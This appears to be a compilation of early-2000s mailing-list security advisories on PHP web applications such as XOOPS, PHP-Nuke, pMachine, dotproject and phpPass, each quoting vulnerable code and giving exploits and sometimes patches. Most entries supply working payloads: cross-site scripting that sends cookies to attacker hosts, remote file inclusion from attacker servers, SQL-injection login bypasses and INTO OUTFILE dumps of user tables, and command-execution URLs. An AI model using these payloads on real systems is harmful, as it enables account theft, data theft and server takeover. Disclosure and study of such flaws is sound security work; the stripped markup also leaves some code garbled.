BBCode XSS in XOOPS CMS
Informations :
°
Language : PHP
Bugged Versions : 1.3.x and less (+ 2.0.x and less ? not checked)
Safe Version : 2.0.3
Website : http://www.xoops.org
Problem : BBcode XSS
PHP Code/Location :
°°°
This hole can be used in modules :
- Private Messages
- News
- NewBB (forum)
class/module/textsanitizer.php :
---
[...]
function xoopsCodeDecode($text){
$patterns = array();
$replacements = array();
[...]
$patterns[] = /\[color=(['\]?)([^\']*)\\1](.*)\[\/color\]/sU;
$replacements[] = span style='color: #\\2;'\\3/span;
$patterns[] = /\[size=(['\]?)([^\']*)\\1](.*)\[\/size\]/sU;
$replacements[] = span style='font-size: \\2;'\\3/span;
$patterns[] = /\[font=(['\]?)([^\']*)\\1](.*)\[\/font\]/sU;
$replacements[] = span style='font-family: \\2;'\\3/span;
[...]
$text = preg_replace($patterns, $replacements, $text);
[...]
return $text;
}
[...]
function oopsHtmlSpecialChars($text) {
$text = htmlspecialchars($text);
$text = str_replace(',',$text);
return $text;
}
[...]
---
Exploit :
°°°
-
[color=FF;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/color]
[size=10;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/size]
[font=Verdana;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/font]
-
function url() from style tag (css) and vbscript are used here to redirect
to the url abcdef + the cookie with the bbcode tags [color] [size] and
[font].
Another style function that could be used is expression().
Patch :
°°
Just download the las version of XOOPS (2.0.3).
[EMAIL PROTECTED]
http://www.phpsecure.info
_
pMachine (PHP) : Include() Security Hole
Informations :
°
Language : PHP
Version : Free 2.2.1
Website : http://www.pmachine.com
Problem : Include() Security Hole
PHP Code/Location :
°°°
This will work if register_globals is ON *OR* OFF.
/pm/lib.inc.php :
-
if (isset($HTTP_COOKIE_VARS))
{
while(list($var,$val)=each($HTTP_COOKIE_VARS))
{
$$var=$val;
}
}
if (isset($HTTP_GET_VARS))
{
while(list($var,$val)=each($HTTP_GET_VARS))
{
$$var=$val;
}
}
if (isset($HTTP_POST_VARS))
{
while(list($var,$val)=each($HTTP_POST_VARS))
{
$$var=$val;
}
}
if (isset($HTTP_SERVER_VARS))
{
while(list($var,$val)=each($HTTP_SERVER_VARS))
{
$$var=$val;
}
}
include ({$pm_path}config$sfx);
if ($debug == 1)
error_reporting(E_ALL);
else
error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING);
include ({$pm_path}db/db.$database$sfx);
include ({$pm_path}db/db.tables$sfx);
include ({$pm_path}lib/pmcode.fns$sfx);
include ({$pm_path}lib/archives.fns$sfx);
include ({$pm_path}lib/benchmark.class$sfx);
include ({$pm_path}lib/birthday.fns$sfx);
include ({$pm_path}lib/calendar.fns$sfx);
include ({$pm_path}lib/category.fns$sfx);
include ({$pm_path}lib/censor.fns$sfx);
include ({$pm_path}lib/comment.fns$sfx);
include ({$pm_path}lib/deprecated.fns$sfx);
include ({$pm_path}lib/email.fns$sfx);
include ({$pm_path}lib/encoded.email$sfx);
include ({$pm_path}lib/forum.fns$sfx);
include ({$pm_path}lib/hitcounter.fns$sfx);
include ({$pm_path}lib/hittracking.fns$sfx);
include ({$pm_path}lib/ip.fns$sfx);
include ({$pm_path}lib/linking.fns$sfx);
include ({$pm_path}lib/mailinglist.fns$sfx);
include ({$pm_path}lib/member.fns$sfx);
include ({$pm_path}lib/memberfiles$sfx);
include ({$pm_path}lib/message.fns$sfx);
include ({$pm_path}lib/minicalendar.fns$sfx);
include ({$pm_path}lib/password.fns$sfx);
include ({$pm_path}lib/pblock.fns$sfx);
include ({$pm_path}lib/search.fns$sfx);
include ({$pm_path}lib/shared.fns$sfx);
include ({$pm_path}lib/stats.fns$sfx);
include ({$pm_path}lib/tellafriend.fns$sfx);
include ({$pm_path}lib/timelock.fns$sfx);
include ({$pm_path}lib/weblog.fns$sfx);
include ({$pm_path}cp/xmlparser$sfx);
include ({$pm_path}cp/rss.cp$sfx);
include ({$pm_path}xmlrpc/ping.fns$sfx);
include ({$pm_path}xmlrpc/xmlrpc.inc);
-
Exploit :
°°°
http://[target]/pm/lib.inc.php?pm_path=http://[attacker]/sfx=.txt with :
http://[attacker]/config.txt
or
http://[target]/pm/lib.inc.php?pm_path=http://[attacker]/sfx=/badcode.txt
with :
http://[attacker]/config/badcode.txt
etc...
Patch :
°°°
A patch can be found on http://www.phpsecure.info.
More Details In French :
°°
http://www.frog-man.org/tutos/pMachineFree2.2.1.txt
_
Re: PHP-Nuke block-Forums.php subject vulnerabilities
I haven't tested but I don't think addslashes() is a good solution here.
The same javascript can be executed without ' or , like this :
lt;name=alt;input type=hidden name=u
value=http://www.attacker.com/prova.phplt;/form
lt;scriptwindow.open(document.a.u.value+document.cookie)lt;/script
What do you think about :
$title2 = htmlspecialchars($title2, ENT_QUOTES);
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: PHP-Nuke block-Forums.php subject vulnerabilities
Date: 31 Mar 2003 11:15:54 -
The block-Forums.php file have a vuln if an attacker
insert a malformatted subject to a topic of Splatt
Forum. A type of subject is:
lt;scriptgt;alert('bug');lt;/scriptgt;
The 'alt' tag is closed by and the other text is
normal html. This bug is very bad if a subject is:
lt;scriptgt;window.open('www.attacker.com/prova.php?cookie='+document.cookie);lt;/scriptgt;
And prova.php register cokkies in a file.
The solution:
Add under $title2 = stripslashes($title2); line, this
line:
$title2 = addslashes($title2);
And now, backward any there is a backslash!
--
[EMAIL PROTECTED]
http://www.phpsecure.info
_
PHP-Nuke 6.0 6.5RC2 SQL Injection Again
Informations :
°°
Language : PHP
Website : http://www.phpnuke.org
Version : 6.0 6.5 RC2
Modules : Forums, Private_Messages
Problem : SQL Injection
PHP Code/Location :
°°°
/modules/Forums/viewtopic.php :
$sql = SELECT forum_type, forum_id, forum_pass, forum_name, forum_access,
forum_moderator, forum_atch FROM ${prefix}_forums WHERE forum_id =
'$forum';
/modules/Forums/viewforum.php :
$sql = SELECT f.forum_id, f.forum_type, f.forum_pass, f.forum_name,
u.uname, u.uid,m.forum_id,m.user_id FROM
${prefix}_forums f, .$user_prefix._users u, ${prefix}_forum_mods m
WHERE f.forum_id = '$forum' AND m.forum_id = '$forum' AND m.user_id =
u.uid;
/modules/Forums/reply.php :
$sql = SELECT forum_name, forum_access, forum_moderator, forum_atch FROM
${prefix}_forums WHERE (forum_id = '$forum');
/modules/Forums/newtopic.php :
$sql = SELECT forum_type, forum_pass, forum_name, forum_access,
forum_moderator, forum_atch FROM ${prefix}_forums WHERE (forum_id =
'$forum');
/modules/Forums/editpost.php :
$sql
= SELECT forum_name, forum_access, forum_moderator, forum_atch FROM
${prefix}_forums WHERE forum_id = '$forum';
/modules/Private_Messages/reply.php :
if ($reply || $send) {
if ($uname != ) {
$res = sql_num_rows(sql_query(select * from .$user_prefix._users where
uname='$uname', $dbi), $dbi);
Exploits :
°°
- This will save forums informations into a txt file :
http://[target]/modules.php?op=modloadname=Forumsfile=viewtopictopic=1forum=1'%20INTO%20OUTFILE%20'[path/to/site]/vt.txt
http://[target]/modules.php?op=modloadname=Forumsfile=viewforumforum='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/vf.txt'/*
http://[target]/modules.php?op=modloadname=Forumsfile=replyforum=1')%20INTO%20OUTFILE%20'[/path]/reply.txt'/*
http://[target]/modules.php?op=modloadname=Forumsfile=newtopicforum=1')%20INTO%20OUTFILE%20'[/path]/newtopic.txt'/*
http://[target]/modules.php?op=modloadname=Forumsfile=editpostforum=1'%20INTO%20OUTFILE%20'[/path]/editpost.txt
etc...
- This will save all users informations into a txt file :
http://[target]/modules.php?name=Private_Messagesfile=replysend=1uname='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/users.txt
Patch :
°°°
A patch can be found on http://www.phpsecure.info
More Details In French :
http://www.frog-man.org/tutos/PHP-Nuke6.0-Forums-Private_Messages.txt
[EMAIL PROTECTED]
_
Recevez vos e-mails MSN Hotmail par SMS sur votre GSM !
http://www.fr.msn.be/gsm/servicesms/hotmailparsms
PHP-Nuke 6.0 ( 6.5?) : Serious SQL Injection Security Holes
Informations :
°°
Language : PHP
Website : http://www.phpnuke.org
Versions : 6.0 ( 6.5?)
Modules : Members_List, Your_Account
Problem : SQL Injection
PHP Configuration : This will work if magic_quotes_gpc=OFF.
PHP Code/Location :
°°°
/modules/Members_List/index.php :
[...]
$count = SELECT COUNT(uid) AS total FROM .$user_prefix._users ;
$select = select uid, name, uname, femail, url from
.$user_prefix._users ;
$where = where uname != 'Anonymous' ;
if ( ( $letter != Other ) AND ( $letter != All ) ) {
$where .= AND uname like '.$letter.%' ;
} else if ( ( $letter == Other ) AND ( $letter != All ) ) {
$where .= AND uname REGEXP \^\[1-9]\ ;
} else {
$where .= ;
}
$sort = order by $sortby;
$limit = ASC LIMIT .$min., .$max;
$count_result = sql_query($count.$where, $dbi);
$num_rows_per_order = mysql_result($count_result,0,0);
$result = sql_query($select.$where.$sort.$limit, $dbi) or die();
echo br;
if ( $letter != front ) {
echo table width=\100%\ border=\0\
cellspacing=\1\tr\n;
echo td BGCOLOR=\$bgcolor4\ align=\center\font
color=\$textcolor2\b._NICKNAME./b/font/td\n;
echo td BGCOLOR=\$bgcolor4\ align=\center\font
color=\$textcolor2\b._REALNAME./b/font/td\n;
echo td BGCOLOR=\$bgcolor4\ align=\center\font
color=\$textcolor2\b._EMAIL./b/font/td\n;
echo td BGCOLOR=\$bgcolor4\ align=\center\font
color=\$textcolor2\b._URL./b/font/td\n;
$cols = 4;
[...]
/modules/Your_Account/index.php :
switch($op) {
[...]
case mailpasswd:
mail_password($uname, $code);
break;
case userinfo:
userinfo($uname, $bypass, $hid, $url);
break;
case login:
login($uname, $pass);
break;
[...]
case saveuser:
saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass,
$bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,
$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter);
break;
[...]
case savehome:
savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,
$popmeson);
break;
case savetheme:
savetheme($uid, $theme);
break;
[...]
case savecomm:
savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax);
break;
[...]
}
/modules/Your_Account/index.php :
[...]
function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass,
$vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,
$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {
global $user, $cookie, $userinfo, $EditedMessage, $user_prefix, $dbi,
$module_name;
cookiedecode($user);
$check = $cookie[1];
$check2 = $cookie[2];
$result = sql_query(select uid, pass from .$user_prefix._users where
uname='$check', $dbi);
list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
if (($uid == $vuid) AND ($check2 == $ccpass)) {
if (!eregi(http://;, $url)) {
$url = http://$url;;
}
if ((isset($pass)) ($pass != $vpass)) {
echo center._PASSDIFFERENT./center;
} elseif (($pass != ) (strlen($pass) $minpass)) {
echo center._YOUPASSMUSTBE. b$minpass/b
._CHARLONG./center;
} else {
if ($bio) { filter_text($bio); $bio = $EditedMessage; $bio =
FixQuotes($bio); }
if ($pass != ) {
cookiedecode($user);
sql_query(LOCK TABLES .$user_prefix._users WRITE, $dbi);
$pass = md5($pass);
sql_query(update .$user_prefix._users set name='$realname',
email='$email', femail='$femail', url='$url', pass='$pass', bio='$bio' ,
user_avatar='$user_avatar', user_icq='$user_icq', user_occ='$user_occ',
user_from='$user_from', user_intrest='$user_intrest', user_sig='$user_sig',
user_aim='$user_aim', user_yim='$user_yim', user_msnm='$user_msnm',
newsletter='$newsletter' where uid='$uid', $dbi);
$result = sql_query(select uid, uname, pass, storynum, umode, uorder,
thold, noscore, ublockon, theme from .$user_prefix._users where
uname='$uname' and pass='$pass', $dbi);
if(sql_num_rows($result, $dbi)==1) {
$userinfo = sql_fetch_array($result, $dbi);
docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
} else {
echo center._SOMETHINGWRONG./centerbr;
}
sql_query(UNLOCK TABLES, $dbi);
} else {
sql_query(update .$user_prefix._users set name='$realname',
email='$email', femail='$femail', url='$url', bio='$bio',
GTcatalog (PHP)
Informations :
°°
Version : 0.9
Website : http://www.geektweaked.com
Problem :
- Informations Disclosure (Admin Password)
- File Including
PHP Code/Location :
°°°
password.inc :
?
$globalpw = [PASSWORD];
?
index.php :
[...]
switch ($function)
{
case custom:
$cc = new Template();
$cc-set_file(head,$dir_base.$dir_template.header.inc);
$cc-set_var(array( 'clientcode' =
$cfg_clientcode,
'title' = $cfg_title. -
.$custom));
$cc-parse(output,head);
$cc-p(output);
include($custom..custom.inc);
include ($dir_base.$dir_template.footer.inc);
break;
[...]
Exploits :
°°
- http://[target]/password.inc
- http://[target]/index.php?function=customcustom=http://[attacker]/1
with :
http://[attacker]/1.custom.inc
Patch :
°°°
A patch can be found on http://www.phpsecure.info (- New Version !! :))
More Details :
°°
In French :
http://www.frog-man.org/tutos/GTcatalog.txt
[EMAIL PROTECTED]
_
MSN Messenger : discutez en direct avec vos amis !
http://messenger.fr.msn.be
Invision Power Board (PHP)
Informations : °° Website : http://www.invisionboard.com -- Version : 1.0.1 Problem : phpinfo() -- Version : 1.1.1 Problem : File Including PHP Code/Location : °°° v1.0.1 : phpinfo.php : -- ?php phpinfo(); ? -- v1.1.1 : ipchat.php : - require $root_path.conf_global.php; - (this is a hole if register_globals=ON) Exploits : °° v1.0.1 : http://[target]/phpinfo.php v1.1.1 : http://[target]/ipchat.php?root_path=http://[attacker]/ with : http://[attacker]/conf_global.php Patchs : Patchs for both versions has been published on http://www.phpsecure.org . More Details : °° In French : http://www.frog-man.org/tutos/InvisionPowerBoard.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FInvisionPowerBoard.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools [EMAIL PROTECTED] _ Recevez vos e-mails MSN Hotmail par SMS sur votre GSM ! http://www.fr.msn.be/gsm/servicesms/hotmailparsms
Myguestbook (PHP)
Informations : °° Version : 3.0 Website : http://www.tefonline.net/ Problems : - XSS - admin infos recovery - Access to admin pages PHP Code/Location : °°° If pseudo = [SCRIPT], e-mail = [SCRIPT] or message = /textarea[SCRIPT] [SCRIPT] will be executed on index.php, /admin/user_modif.php, /admin/admin_modif.php and /admin/admin_suppr.php . /admin/confirm_connect.php : - SetCookie(Myguestbook,$name:$password); - /admin/admin_pass.php, /admin/admin_index.php, /admin/admin_modif.php and /admin/admin_suppr.php : ? if(!isset($Myguestbook)) header(location:../index.php?MSG=permis); ? Exploits : °° [SCRIPT] : script location='http://[attacker]/file.php?'+document.cookie; /script http://[target]/admin/admin_index.php?Myguestbook=1 http://[target]/admin/admin_pass.php?Myguestbook=1 http://[target]/admin/admin_modif.php?Myguestbook=1 http://[target]/admin/admin_suppr.php?Myguestbook=1 http://[target]/admin/user_modif.php?id=[MESSAGEID] Solution : °° A patch can be found on http://www.phpsecure.org. More Details : °° In French : http://www.frog-man.org/tutos/Myguestbook.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyguestbook.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools [EMAIL PROTECTED] _
php-Board (php)
Informations :
°°
Website : http://www.hp-planet.de
Version : 1
Problem : Informations disclosure
PHP Code/Location :
°°°
login.php :
-
function passwd2($user)
{
$password=nicht registriert;
if (file_exists(user/.$user..txt))
{
$fp = fopen(user/.$user..txt,r);
$data = fgetcsv($fp,1,#);
fclose($fp);
$password=$data[0];
}
return($password);
}
-
Exploit :
°
http://[target]/user/[NICKNAME].txt
More details :
°°
In French :
http://www.frog-man.org/tutos/5holes8.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txtlangpair=fr%7Cenhl=frie=ISO-8859-1prev=%2Flanguage_tools
frog-m@n
http://www.phpsecure.org
_
DotBr (PHP)
Informations :
°°
Website : http://dotbr.org
Version : 0.1
Problems :
- phpinfo()
- Informations disclosure
- System commands execution
PHP Code/Location :
°°°
foo.php3 :
-
? phpinfo(); ?
-
config.inc :
- SQL password
- SQL host
- SQL username
- SQL DB name
admin/exec.php3 :
---
html
body
pre
?
if (!isset($sep)) {
$sep = _;
}
$cmd=str_replace($sep, ,$cmd);
passthru($cmd,$ret);
echo $ret;
?
/pre
/body
/html
---
admin/system.php3 :
---
html
body
pre
?
$cmd = str_replace(_, ,$cmd);
system($cmd,$result);
echo \n result == . $result . \n;
?
/pre
/body
/html
---
Exploits :
°°
http://[target]/foo.php3
http://[target]/config.inc
http://[target]/admin/exec.php3?cmd=[COMMAND]
http://[target]/admin/system.php3?cmd=[COMMAND]
More Details :
°°
In French :
http://www.frog-man.org/tutos/5holes8.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txtlangpair=fr%7Cenhl=frie=ISO-8859-1prev=%2Flanguage_tools
frog-m@n
http://www.phpsecure.org
_
D-Forum (PHP)
Informations :
°°
Website : http://www.adalis.fr/adalis.html
Versions : 1.00 - 1.11
Problem : Include file
PHP Code/Location :
°°°
/includes/header.php3 :
---
?php
if ($my_header!=)
{
include ($my_header);
} else {
?
...
--
/includes/footer.php3 :
---
...
if ($my_footer!=)
{
include ($my_footer);
} else {
?
...
---
Exploits :
°°
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt
or
http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt
with
http://[attacker]/script.txt
Patch :
°°°
A patch can be found on http://www.phpsecure.info .
More details :
°°
(in French) http://www.frog-man.org/tutos/5holes8.txt
frog-m@n
_
MSN Messenger : discutez en direct avec vos amis !
http://messenger.fr.msn.be
phpMyShop (php)
Informations :
°°
Version : 1.00
Website : http://www.pc-encheres.com
Problem : SQL Injection
PHP Code/Location :
°°°
compte.php :
---
?
session_start();
if (isset($achat))
{
session_register(achat);
}
else
{
header(location:index.php);
}
include(design/header.php);
require(config.php);
require(fonction.php);
echotd bgcolor=\$barre1\font color=\$police3\
size=\$width_police2\strongIdentification/strong/font/td
/tr
tr
tdbr;
if (isset($valider))
{
$sql = SELECT id_cli,login_cli,pass_cli FROM $table_client where
login_cli='$identifiant' and pass_cli='$password';
$sql = mysql_db_query($base,$sql);
$test = mysql_num_rows($sql);
if ($test==0)
{
?
script language=javascript
alert(Identifiant ou mot de passe non valide!);
/script
?
echocenterstrongIdentifiant ou mot de passe non
valide!/strong/centerbr;
}
else
{
$id_membre = mysql_result($sql,0,id_cli);
session_register(id_membre);
?
script language=javascript
document.location.href=valide.php
/script
?
}
}
[...]
---
Exploit :
°
http://[target]/compte.php?achat=1valider=1identifiant='%20OR%20''='password='%20OR%20''='
Solution :
°°
A patch has been published on http://www.phpsecure.info .
More details :
°°
In French :
http://www.frog-man.org/tutos/phpmyshop.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2Fphpmyshop.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools
frog-m@n
_
Recevez vos e-mails MSN Hotmail par SMS sur votre GSM !
http://www.fr.msn.be/gsm/servicesms/hotmailparsms
myphpPagetool (php)
Informations : °° Version : 0.4.3-1 Website : http://myphppagetool.sourceforge.net/ Problem : Include file PHP Code/Location : °°° In /doc/admin/, in the files index.php, help1.php, help2.php, help3.php, help4.php, help5.php, help6.php, help7.php, help8.php and help9.php : ?php include ($ptinclude . /pt_config.inc); [...] Exploit : ° http://[target]/doc/admin/index.php?ptinclude=http://[attacker] with : http://[attacker]/pt_config.inc (if registers_global=ON) Solution : °° A patch has been published on http://www.phpsecure.info . More details : °° In French : http://www.frog-man.org/tutos/myphpPagetool.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FmyphpPagetool.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ MSN Search, le moteur de recherche qui pense comme vous ! http://search.fr.msn.be
Re: dotproject Remote Code Execution Vulnerability : Patch
A non-official patch has been created for this hole and is published on
http://www.phpsecure.org/index.php?zone=pPatchAsAlpha=dl=us (english
version) .
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: dotproject Remote Code Execution Vulnerability
Date: Wed, 29 Jan 2003 04:02:24 -0800
dotproject Remote Code Execution Vulnerability (By Mindwarper)
--- ---
--
Vendor Information:
--
Homepage : http://www.dotproject.net
Vendor : informed
Mailed advisory: 28/01/03
Vender Response : None
--
Affected Versions:
--
dev20030121
--
Vulnerability:
--
dotproject is a PHP+MySQL beta level web based project management and
tracking tool
that dotmarketing started in Dec. 2000.
Inside the directory /modules/ multiple files try to include
classdefs/date.php
without defining $root_dir first and allow remote attackers to inject their
own
servers if globals are set on.
Example Code from modules/projects/addedit.php:
**
?php
##
## Files modules: index page re-usable sub-table
##
require_once( $root_dir/classdefs/date.php );
$df = $AppUI-getPref('SHDATEFORMAT');
$tf = $AppUI-getPref('TIMEFORMAT');
**
As you can see nothing happens before the require_once function is called
and therefore
with globals set on an attacker may include remote files.
Example:
http://victim/dotproject/modules/files/index_table.php?root_dir=http://attacker
this works also on
http://victim/dotproject/modules/projects/addedit.php?root_dir=http://attacker
http://victim/dotproject/modules/projects/view.php?root_dir=http://attacker
http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://attacker
http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://attacker
http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker
--
Solution:
--
Please check the vendor's website for new patches.
As a temporary solution, create a .htaccess file that contains 'Deny from
all'.
Place it in the /modules/ directory and that should block remote users from
accessing it.
--
Contact:
--
Name: Mindwarper
Email: [EMAIL PROTECTED]
Website: http://mindlock.bestweb.net
--- ---
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliatel=427
_
Re: Zorum Portal (PHP)
A patch has been created for this hole and can be found on http://www.phpsecure.org/. From: MGhz [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Zorum Portal (PHP) Date: 22 Jan 2003 19:45:26 - Version : 3.0;3.1;3.2 Website : http://zorum.phpoutsourcing.com/ Problem : Include file File: - include.php - PHP Code: - [...] include($gorumDir/generformlib_multipleselection.php); include($gorumDir/generformlib_groupselection.php); include($gorumDir/generformlib_filebutton.php); include($gorumDir/group.php); [...] - Exploit : - http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/ -- include http://[attacker]/group.php on remote server - -- [EMAIL PROTECTED] _
MyRoom (PHP)
Informations :
°°
Website : http://www.plansbiz.net
Version : 3.5 GOLD
Problems : File copy/upload
PHP Code/Location :
°°°
room/save_item.php :
if($name == OR $ref == ){
echo You are fogot enter your 'ITEM NAME' or 'ITEM REF NO' !;
echo br;
echo a href='$main_file?show=additem'Try Agains [ Click Here ]/a;
exit;
}
if($photo!=none AND $photo!=application/octet-stream){
//get type of file
$filetype=$photo_type;
//get lenght of image type
$filelenght=strlen($filetype);
//get part of file image to build image extension
$pos=strpos($filetype,/)+1;
//build extension of image
$fileextention=substr($filetype,$pos,$filelenght);
if($fileextention==pjpeg){
$fileextention=jpg;
}
$image=date(YmdHis);
$image.=..$fileextention;
$imgpath = $imgroot;
//if image exist, upload it in correct dir
if($photovnone) {
if(!copy($photo,$imgpath/$image)) {
//display errors
$msg=brfont color='text00'File Not Uploaded, it might be too large or
does not exist..brPlease Try Again!/font;
break;
}
//or finish
else {
dbconnect();
$sql= INSERT INTO room_item SET it_photo='$image', it_name='$name',
it_decs='$decs', it_ab='$album', it_ref='$ref';
mysql_query($sql) or die(mysql_error());
echo meta http-equiv='refresh' content='0;URL=
$main_file?show=additemm=1i=$name';
echo brYour File Was Uploaded Sucessful!! brbra
href='$main_file?show=additemm=1i=$name'Loading ../a;
}
}
Exploits :
°°
http://[target]/room/save_item.php?name=[NAME]ref=hackedphoto=../inc/conf.phpphoto_type=ttxt
+ http://[target]/room/index.php?show=searchsearch=it_nameitem=[NAME]
to find the url of the txt file in wich is conf.php.
Patch :
°°°
A patch can be found on http://www.phpsecure.info (english version
available) .
More Details :
°°
In French :
http://www.frog-man.org/tutos/MyRoom.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyRoom.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools
frog-m@n
_
MSN Search, le moteur de recherche qui pense comme vous !
http://search.msn.fr/worldwide.asp
phpPass (PHP)
Informations :
°°
Version : 2
Website : http://www.agames-net.com
Problem : SQL Injection
PHP Code/Location :
°°°
accesscontrol.php :
[...]
session_register(uid);
session_register(pwd);
[...]
$sql = SELECT * FROM user WHERE
userid = '$uid' AND password = '$pwd';
$result = mysql_query($sql);
[...]
if (mysql_num_rows($result) == 0) {
session_unregister(uid);
session_unregister(pwd);
?
html
head
title Access Denied /title
[...]
exit;
[...]
Exploit :
°
http://[target]/protectedpage.php?uid='%20OR%20''='pwd='%20OR%20''='
Patch :
°°°
In accesscontrol.php, replace the lines :
-
$sql = SELECT * FROM user WHERE
userid = '$uid' AND password = '$pwd';
$result = mysql_query($sql);
by :
$uid=addslashes($uid);
$pwd=addslashes($pwd);
$sql = SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd';
$result = mysql_query($sql);
A patch can be found on http://www.phpsecure.org .
More details :
°°
In French :
http://www.frog-man.org/tutos/phpPass.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpPass.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools
frog-m@n
_
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
vSignup, vAuthenticate (PHP)
Informations :
°°
---
Product : vAuthenticate
Version : 2.8
---
Product : vSignup
Version : 2.1
---
Website : http://www.beanbug.net
Problem : SQL Injection
PHP Code/Location :
°°°
chgpwd.php :
---
?
if (!class_exists(auth))
{
include (auth.php);
}
include (authconfig.php);
include (check.php);
?
---
admin/index.php :
--
?
if (!class_exists(auth))
{
include (../auth.php);
}
include (../authconfig.php);
include (../check.php);
if ($check[level] != 1)
{
--
check.php :
?
$CheckSecurity = new auth();
$check = $CheckSecurity-page_check($USERNAME, $PASSWORD);
if ($check == false)
{
// Feel free to change the error message below. Just make sure you put a
\ before
// any double quote.
print font face=\Arial, Helvetica, sans-serif\ size=\5\
color=\#FF\;
print bIllegal Access/b;
print /fontbr;
print font face=\Verdana, Arial, Helvetica, sans-serif\ size=\2\
color=\#00\;
print bYou do not have permission to view this page./b/font;
exit; // End program execution. This will disable continuation of
processing the rest of the page.
}
?
auth.php :
function page_check($username, $password) {
$query = SELECT * FROM authuser WHERE uname='$username' AND
passwd='$password' AND status 'inactive';
$connection = mysql_connect($this-HOST, $this-USERNAME, $this-PASSWORD);
// OLD CODE - DO NOT REMOVE
// $result = mysql_db_query($this-DBNAME, $query);
// REVISED CODE
$SelectedDB = mysql_select_db($this-DBNAME);
$result = mysql_query($query);
$numrows = mysql_num_rows($result);
$row = mysql_fetch_array($result);
// CHECK IF THERE ARE RESULTS
// Logic: If the number of rows of the resulting recordset is 0, that means
that no
// match was found. Meaning, wrong username-password combination.
if ($numrows == 0) {
return false;
}
else {
return $row;
}
} // End: function page_check
Exploits :
°°
http://[target]/chgpwd.php?USERNAME=[username]PASSWORD='%20OR%20''='
http://[target]/admin/index.php?USERNAME='%20OR%20''='PASSWORD='%20OR%201=1%20AND%20level='1
Patchs :
A patch can be found on http://www.phpsecure.org.
More details :
°°
In French :
http://www.frog-man.org/tutos/vAuth-Signup.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FvAuth-Signup.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools
frog-m@n
_
MSN Search, le moteur de recherche qui pense comme vous !
http://search.msn.fr/worldwide.asp
E-theni (PHP)
Informations :
°°
Version : ?
Website : http://www.theni.freesurf.fr
Problems :
- Include file
- phpinfo()
PHP Code/Location :
°°°
/admin_t/include/aff_liste_langue.php :
-
require ($rep_include.para_langue.php);
-
/admin_t/include/find_theni_home.php :
--
html
body
?
phpinfo();
?
/body/html
--
Exploits :
°°
-
http://[target]/admin_t/include/aff_liste_langue.php?rep_include=http://[attacker]/
with :
http://[attacker]/para_langue.php
(This will work only if register_globals=ON)
- http://[target]/admin_t/include/find_theni_home.php
Patchs :
In admin_t/include/aff_liste_langue.php, replace the line :
-
require ($rep_include.para_langue.php);
-
by :
-
if (file_exists($rep_include.para_langue.php)){
require ($rep_include.para_langue.php);
}
-
To replace the file /admin_t/include/find_theni_home.php by :
--
?
session_start();
if (session_is_registered(USER)==FALSE or $USER[id_user]1){
exit;
} else {
echo html;
echo body;
phpinfo();
echo /body/html;
}
?
--
A patch can be found on http://www.phpsecure.org.
More details :
°°
In French :
http://www.frog-man.org/tutos/E-theni.txt
Translated by Google :
